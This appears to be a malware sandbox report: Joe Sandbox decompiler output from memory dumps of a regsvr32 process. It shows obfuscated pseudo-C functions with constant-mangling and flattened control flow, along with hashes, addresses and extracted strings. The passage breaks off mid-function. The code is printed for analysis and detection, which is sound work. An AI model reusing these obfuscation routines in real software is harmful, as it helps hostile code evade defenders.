Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: B:}I
API String ID: 0-2889142627
Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction ID: 6e39d68c5432a42b2674c022b5189c7f0029639c095d1278f956ade93d6cd731
Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction Fuzzy Hash: E041BA71608742DBD798CF21D98582FBBE4FBD4718F000A1DF581A62A0E775AA0D8F93

Uniqueness

Uniqueness Score: -1.00%

Function 040E0ABA, Relevance: 1.3, Strings: 1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E040E0ABA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t98;
				signed int _t104;
				signed int _t105;
				intOrPtr _t116;

				_push(0x104);
				_push(_a16);
				_v44 = 0x104;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(0x104);
				_v56 = 0x2049f9;
				_t116 = 0;
				_v52 = 0;
				_v48 = 0;
				_v20 = 0xeb153a;
				_v20 = _v20 | 0xe521a998;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x000387ae;
				_v32 = 0xc4823f;
				_v32 = _v32 + 0xd346;
				_v32 = _v32 ^ 0x00c87855;
				_v28 = 0x319d41;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x000ba15b;
				_v16 = 0x4743d7;
				_t104 = 0x54;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0xf604c8f9;
				_v16 = _v16 ^ 0xf6068564;
				_v24 = 0x18550b;
				_v24 = _v24 ^ 0x1069247b;
				_t105 = 5;
				_v24 = _v24 / _t105;
				_v24 = _v24 ^ 0x03437d28;
				_v36 = 0xafe78e;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xafe5259b;
				_v8 = 0xc66a38;
				_v8 = _v8 ^ 0x50a68901;
				_v8 = _v8 ^ 0x40045619;
				_v8 = _v8 * 0x15;
				_v8 = _v8 ^ 0x584c57e2;
				_v12 = 0xdb79dc;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x1655447b;
				_v12 = _v12 ^ 0x796b06cf;
				_v40 = 0x1393c;
				_v40 = _v40 + 0x9e03;
				_v40 = _v40 ^ 0x000e16cd;
				_t98 = E040EF790(_t105, _a12, _v20);
				_t115 = _t98;
				if(_t98 != 0) {
					_t116 = E040DDAAA(_t115, _v24, _v36, _a8, _v8, _t105,  &_v44);
					E040F1538(_v12, _v40, _t115);
				}
				return _t116;
			}

0x040e0ac7
0x040e0ac8
0x040e0acb
0x040e0ace
0x040e0ad1
0x040e0ad4
0x040e0ad7
0x040e0ad8
0x040e0ad9
0x040e0ade
0x040e0ae5
0x040e0ae7
0x040e0aec
0x040e0aef
0x040e0af6
0x040e0afd
0x040e0b01
0x040e0b08
0x040e0b0f
0x040e0b16
0x040e0b1d
0x040e0b24
0x040e0b28
0x040e0b2f
0x040e0b3b
0x040e0b40
0x040e0b45
0x040e0b4c
0x040e0b53
0x040e0b5a
0x040e0b64
0x040e0b6a
0x040e0b6d
0x040e0b74
0x040e0b7b
0x040e0b7f
0x040e0b86
0x040e0b8d
0x040e0b94
0x040e0b9f
0x040e0ba2
0x040e0ba9
0x040e0bb0
0x040e0bb4
0x040e0bb8
0x040e0bbf
0x040e0bc6
0x040e0bcd
0x040e0bd4
0x040e0beb
0x040e0bf0
0x040e0bf7
0x040e0c14
0x040e0c1a
0x040e0c1f
0x040e0c29

Strings

WLX, xrefs: 040E0BA2

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: WLX
API String ID: 0-2077286540
Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction ID: c2566b3f14ca495c5cbdce5e8a93940a8950e24f20d178a48598019534820871
Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction Fuzzy Hash: 3741FFB2D01209EFDF04DFA5D94A8EEBBB5FB48308F208149E912B6220D3B55A558F90

Uniqueness

Uniqueness Score: -1.00%

Function 040EFBDE, Relevance: 1.3, Strings: 1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040EFBDE() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t97;
				void* _t99;
				intOrPtr _t100;
				signed int _t108;
				signed int _t109;
				void* _t111;

				_v44 = _v44 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				_v48 = 0xd22319;
				_v20 = 0x8c11a4;
				_v20 = _v20 ^ 0x18a8aba7;
				_t108 = 0xa;
				_v20 = _v20 / _t108;
				_v20 = _v20 ^ 0x026f5dce;
				_v16 = 0xc2c77c;
				_t99 = 0xb09cdbf;
				_v16 = _v16 | 0x0f3eeb6c;
				_t109 = 0x25;
				_v16 = _v16 / _t109;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0x16ecca7d;
				_v12 = 0x9a8850;
				_v12 = _v12 * 0x3d;
				_v12 = _v12 + 0xffff2448;
				_v12 = _v12 + 0xffff902b;
				_v12 = _v12 ^ 0x24dbb777;
				_v8 = 0xd2df60;
				_v8 = _v8 + 0xffff203f;
				_v8 = _v8 | 0xa0e0e7e8;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x3c71d6f5;
				_v32 = 0x56890f;
				_v32 = _v32 << 0xa;
				_v32 = _v32 + 0x42ee;
				_v32 = _v32 ^ 0x5a20a45b;
				_v28 = 0x745af2;
				_v28 = _v28 + 0x7057;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0x0d34271a;
				_v36 = 0xe2682;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x000bc26f;
				_v24 = 0x784a24;
				_v24 = _v24 + 0x8efc;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x000a24d7;
				do {
					while(_t99 != 0x4881f76) {
						if(_t99 == 0xb09cdbf) {
							_push(_t99);
							_push(_t99);
							_t97 = E040DC5D8(0x124);
							_t111 = _t111 + 0xc;
							 *0x40f621c = _t97;
							_t99 = 0x4881f76;
							continue;
						}
						goto L5;
					}
					_t100 =  *0x40f621c; // 0x0
					E040E9DF5(_t100 + 4, _v32, _v28, _v36, _v24);
					_t111 = _t111 + 0xc;
					_t99 = 0x6dda74a;
					L5:
				} while (_t99 != 0x6dda74a);
				return 1;
			}

0x040efbe4
0x040efbea
0x040efbee
0x040efbf5
0x040efbfc
0x040efc0b
0x040efc10
0x040efc15
0x040efc21
0x040efc28
0x040efc2a
0x040efc39
0x040efc41
0x040efc48
0x040efc4b
0x040efc52
0x040efc5d
0x040efc60
0x040efc67
0x040efc6e
0x040efc75
0x040efc7c
0x040efc83
0x040efc8a
0x040efc8e
0x040efc95
0x040efc9c
0x040efca0
0x040efca7
0x040efcae
0x040efcb5
0x040efcc0
0x040efcc3
0x040efcca
0x040efcd1
0x040efcd5
0x040efcdc
0x040efce3
0x040efcea
0x040efcee
0x040efcf5
0x040efcf5
0x040efcfb
0x040efd09
0x040efd0a
0x040efd10
0x040efd15
0x040efd18
0x040efd1d
0x00000000
0x040efd1d
0x00000000
0x040efcfb
0x040efd2a
0x040efd36
0x040efd3b
0x040efd3e
0x040efd40
0x040efd40
0x040efd4d

Strings

$Jx, xrefs: 040EFCDC

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $Jx
API String ID: 0-2488101295
Opcode ID: b01db8830b3caf9250260e1761a5492b914322942c9dfed3e2f813b12400b51e
Instruction ID: 3cda93614b657771c7ff8e039d83c33e8f4fc99be0d91baa4d4429292826b266
Opcode Fuzzy Hash: b01db8830b3caf9250260e1761a5492b914322942c9dfed3e2f813b12400b51e
Instruction Fuzzy Hash: 3F413671E0021AEFDF48CFE5C98A5EEBBB1FB44318F208159D512B6250D7B85A49CF91

Uniqueness

Uniqueness Score: -1.00%

Function 040D7078, Relevance: 1.3, Strings: 1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E040D7078(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t109;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				void* _t132;
				void* _t133;
				signed int _t134;

				_v12 = 0x8f98c8;
				_v12 = _v12 >> 1;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x6b25fb67;
				_v12 = _v12 ^ 0xa7412f1a;
				_v8 = 0xcf53a8;
				_v8 = _v8 + 0xffff4190;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xcc79c588;
				_v8 = _v8 ^ 0xffd9b9f8;
				_v32 = 0xdc21b3;
				_t133 = __ecx;
				_t113 = 0x53;
				_v32 = _v32 / _t113;
				_v32 = _v32 ^ 0x0002aeef;
				_v20 = 0xa54b66;
				_t114 = 0x25;
				_v20 = _v20 / _t114;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x00488e30;
				_v28 = 0xf9718f;
				_v28 = _v28 | 0xd1e9f83c;
				_v28 = _v28 + 0xbce;
				_v28 = _v28 ^ 0xd1f9aa01;
				_v16 = 0x596927;
				_t115 = 0x70;
				_v16 = _v16 / _t115;
				_t116 = 0x65;
				_v16 = _v16 / _t116;
				_t117 = 0x1e;
				_v16 = _v16 / _t117;
				_v16 = _v16 ^ 0x0002780a;
				_v24 = 0x48f141;
				_v24 = _v24 << 0xe;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x1e282004;
				_v36 = 0x9232a3;
				_t118 = 0x42;
				_push(_t118);
				_v36 = _v36 / _t118;
				_v36 = _v36 ^ 0x00023701;
				_push(_t118);
				_t109 = E040ECCA0(_v24, _v36);
				_push(_t133);
				_t134 = _t109;
				_push(_t134);
				_push(_v16);
				_t132 = 3;
				E040DE404(_v28, _t132);
				 *((short*)(_t133 + _t134 * 2)) = 0;
				return 0;
			}

0x040d707e
0x040d7087
0x040d708a
0x040d708e
0x040d7095
0x040d709c
0x040d70a3
0x040d70aa
0x040d70ae
0x040d70b5
0x040d70bc
0x040d70ca
0x040d70cc
0x040d70d1
0x040d70d6
0x040d70dd
0x040d70e7
0x040d70ec
0x040d70f1
0x040d70f5
0x040d70fc
0x040d7103
0x040d710a
0x040d7111
0x040d7118
0x040d7122
0x040d7127
0x040d712f
0x040d7134
0x040d713c
0x040d7141
0x040d7146
0x040d714d
0x040d7154
0x040d7158
0x040d715b
0x040d7162
0x040d716c
0x040d716f
0x040d7170
0x040d7173
0x040d7186
0x040d718d
0x040d7192
0x040d7193
0x040d7195
0x040d7196
0x040d719b
0x040d719f
0x040d71a9
0x040d71b2

Strings

'iY, xrefs: 040D7118

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 'iY
API String ID: 0-1691070665
Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction ID: 3a68f47b3b51d044079ef14a9f90b150ce31c58726b4f6f5fd56d7c08f802d0f
Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction Fuzzy Hash: F2411572E00219EBEF08DFA5D94A9EEFBB2FB44304F208059D515BB290D7B55A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 040E6187, Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040E6187(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t52;
				void* _t56;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				signed int* _t64;

				_t58 = __ecx;
				_t64 =  &_v36;
				_v12 = 0x9a6334;
				_t59 = 0x428baaa;
				_v8 = 0x1104ea;
				_t62 = 0;
				_v4 = 0;
				_v28 = 0xb15b0c;
				_t61 = __ecx;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0xf86649d6;
				_v28 = _v28 ^ 0xec767c96;
				_v36 = 0x38db19;
				_v36 = _v36 ^ 0x5bdda26a;
				_v36 = _v36 + 0xffff005e;
				_v36 = _v36 | 0xaa371973;
				_v36 = _v36 ^ 0xfbf0c1f1;
				_v32 = 0x2e8edf;
				_v32 = _v32 | 0x3500a324;
				_v32 = _v32 ^ 0x353f0f34;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000af409;
				_v16 = 0xfc04c2;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000f83ee;
				_v20 = 0xce9672;
				_v20 = _v20 | 0xcae5864f;
				_v20 = _v20 ^ 0xcae41209;
				_v24 = 0x20b296;
				_v24 = _v24 | 0x98e19d34;
				_v24 = _v24 ^ 0x98e5764e;
				do {
					while(_t59 != 0x2638d08) {
						if(_t59 == 0x428baaa) {
							_t59 = 0x994f089;
							continue;
						} else {
							if(_t59 == 0x994f089) {
								_push(_t58);
								_t56 = E040E07F0();
								_t64 =  &(_t64[1]);
								_t59 = 0x2638d08;
								_t62 = _t62 + _t56;
								continue;
							}
						}
						goto L7;
					}
					_t58 = _t61 + 4;
					_t52 = E040EBE8C(_t58, _v32, _v16, _v20, _v24);
					_t64 =  &(_t64[3]);
					_t59 = 0xb7af90a;
					_t62 = _t62 + _t52;
					L7:
				} while (_t59 != 0xb7af90a);
				return _t62;
			}

0x040e6187
0x040e6187
0x040e618a
0x040e6192
0x040e6197
0x040e61a2
0x040e61a9
0x040e61b2
0x040e61c0
0x040e61c2
0x040e61c6
0x040e61ce
0x040e61d6
0x040e61de
0x040e61e6
0x040e61ee
0x040e61f6
0x040e61fe
0x040e6206
0x040e620e
0x040e6216
0x040e621b
0x040e6223
0x040e622b
0x040e6230
0x040e6238
0x040e6240
0x040e6248
0x040e6250
0x040e6258
0x040e6260
0x040e6268
0x040e6268
0x040e6272
0x040e628f
0x00000000
0x040e6274
0x040e6276
0x040e6280
0x040e6281
0x040e6286
0x040e6289
0x040e628b
0x00000000
0x040e628b
0x040e6276
0x00000000
0x040e6272
0x040e6297
0x040e62a6
0x040e62ab
0x040e62ae
0x040e62b3
0x040e62b5
0x040e62b5
0x040e62c6

Strings

^, xrefs: 040E61E6

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction ID: f092d2b7ee4094ca8ea70173af2c1d5da11bd876a9ad11bcdd25307d9677acde
Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction Fuzzy Hash: 4F3156716093428FC758CF25E58541FBBE1BBD4748F404E1DF485A6221D3B5EA2A8B93

Uniqueness

Uniqueness Score: -1.00%

Function 040ECAD5, Relevance: 1.3, Strings: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E040ECAD5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _t69;
				intOrPtr _t76;
				signed int _t78;
				signed int _t86;
				intOrPtr* _t87;

				_t87 = _a8;
				_t86 = _a12;
				_push(_t86);
				_push(_t87);
				_push(_a4);
				E040EFE29(_t69);
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v36 = 0xc93ec5;
				_a8 = 0xcab84b;
				_a8 = _a8 >> 1;
				_a8 = _a8 | 0xee18e3b9;
				_a8 = _a8 ^ 0xee71da74;
				_v16 = 0x1dfffe;
				_v16 = _v16 | 0x90f94c10;
				_v16 = _v16 ^ 0x90ff99a5;
				_v12 = 0xe4edc;
				_v12 = _v12 ^ 0xcefa836b;
				_v12 = _v12 ^ 0xcefa5bee;
				_a12 = 0xedd33e;
				_a12 = _a12 ^ 0xf7b2c6ca;
				_a12 = _a12 | 0xdc5ffd20;
				_a12 = _a12 ^ 0xadaf2279;
				_a12 = _a12 ^ 0x52f8ee07;
				_v8 = 0x14e12c;
				_t78 = 6;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t78;
				_v8 = _v8 ^ 0x002f50e1;
				_v24 = 0x3584ef;
				_v24 = _v24 ^ 0xd7b39bf3;
				_v24 = _v24 ^ 0xd7855a87;
				_v20 = 0x11ef3f;
				_v20 = _v20 ^ 0xad5d4e81;
				_v20 = _v20 ^ 0xad432fff;
				E040E0A90(_a8, _v16, _v12, _t86, _a12,  *((intOrPtr*)(_t87 + 4)));
				E040EC9B0(_v8,  *((intOrPtr*)(_t86 + 0x34)), _v24,  *((intOrPtr*)(_t87 + 4)),  *_t87, _v20);
				_t76 =  *((intOrPtr*)(_t87 + 4));
				 *((intOrPtr*)(_t86 + 0x34)) =  *((intOrPtr*)(_t86 + 0x34)) + _t76;
				return _t76;
			}

0x040ecadc
0x040ecae0
0x040ecae3
0x040ecae4
0x040ecae5
0x040ecaea
0x040ecaef
0x040ecaf5
0x040ecaf9
0x040ecb00
0x040ecb07
0x040ecb0a
0x040ecb11
0x040ecb18
0x040ecb1f
0x040ecb26
0x040ecb2d
0x040ecb34
0x040ecb3b
0x040ecb42
0x040ecb49
0x040ecb50
0x040ecb57
0x040ecb5e
0x040ecb65
0x040ecb72
0x040ecb73
0x040ecb7b
0x040ecb7e
0x040ecb85
0x040ecb8c
0x040ecb93
0x040ecb9a
0x040ecba1
0x040ecba8
0x040ecbbf
0x040ecbd5
0x040ecbda
0x040ecbe0
0x040ecbe8

Strings

P/, xrefs: 040ECB7E

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: P/
API String ID: 0-4116444305
Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction ID: b7995180ce5574d09c0338a569fc2787e63d40008ea5778c3ee5009df98268a3
Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction Fuzzy Hash: 6831337190120AEFDF18CFA1CA068DEBBB5FF44304F108549E926B6220C3B5AB61DF81

Uniqueness

Uniqueness Score: -1.00%

Function 040F2B09, Relevance: 1.3, Strings: 1, Instructions: 57
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E040F2B09(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t59;
				signed int _t68;
				void* _t74;

				_push(_a8);
				_t74 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t59);
				_v8 = 0x93d6ec;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0xffff3f9a;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00010f7f;
				_v16 = 0x446197;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0xffff9430;
				_v16 = _v16 ^ 0x00039bf5;
				_v12 = 0x6cea88;
				_v12 = _v12 >> 1;
				_t68 = 0x54;
				_v12 = _v12 / _t68;
				_v12 = _v12 + 0x3de4;
				_v12 = _v12 ^ 0x00083458;
				_v20 = 0x13246e;
				_v20 = _v20 << 0xf;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x800a585e;
				_v20 = 0x9dc8c5;
				_v20 = _v20 + 0xe5f4;
				_v20 = _v20 + 0xffffcd2d;
				_v20 = _v20 ^ 0x00910c57;
				_v12 = 0x6d0957;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0xc39cd689;
				_v12 = _v12 ^ 0x6e460985;
				_v12 = _v12 ^ 0xad0dfd5a;
				return E040E0C2A(E040F28EB(), _v20, _t68, _v12, _t74);
			}

0x040f2b10
0x040f2b13
0x040f2b15
0x040f2b18
0x040f2b19
0x040f2b1a
0x040f2b1f
0x040f2b29
0x040f2b2f
0x040f2b36
0x040f2b3a
0x040f2b41
0x040f2b48
0x040f2b4c
0x040f2b53
0x040f2b5a
0x040f2b61
0x040f2b69
0x040f2b6c
0x040f2b6f
0x040f2b76
0x040f2b7d
0x040f2b84
0x040f2b88
0x040f2b8c
0x040f2b93
0x040f2b9a
0x040f2ba1
0x040f2ba8
0x040f2baf
0x040f2bb6
0x040f2bb9
0x040f2bc0
0x040f2bc7
0x040f2bef

Strings

Wm, xrefs: 040F2BAF

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Wm
API String ID: 0-1953712011
Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction ID: e1ef6d377bf495180431b3b3cd5dfac9ae42361ffa9ad928291197ea8aa1de73
Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction Fuzzy Hash: 4821F071D01319EBDB559FE5D84A4EEBBB1FB00318F108699D42576250D3B51B98DF80

Uniqueness

Uniqueness Score: -1.00%

Function 1001929D, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: bcf109f5de06b5c94f6bb42cf1b44ca8dbb3bfcebafd793729c585c81d35ca35
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: E0D15F73C0AAB30A8376C12D415862EEEE2AFC199531BC7E1DCD43F289D136DE8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 10018E7D, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 58f509fdb222ca7060b2eae822090135517dfdc7c002ac52267cef539c7c6eb7
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 07D16073C0AAB30A8376C12D415852EEBE2AFC199531BC7E1DCD43F289D636DE8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 10018A71, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: cc46d25ea22f0c970390981d75405525d0e25b6b0a86731603265a14af2b5516
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 2EC14F73C0AAF30A8375C12D455812AEFE2AFC169531BC7E1DCD43F28992369F8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 1001869D, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: dcda9d5c94f77def7d8943a89e96ba339e92ee3075ebe02bffe06bb3663a938a
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 2AC14D73D0AAF30A8365C12D455812AEAE2AFC158432FC7A1DCD43F289D636DF8597D0

Uniqueness

Uniqueness Score: -1.00%

Function 040D1CA1, Relevance: .1, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E040D1CA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
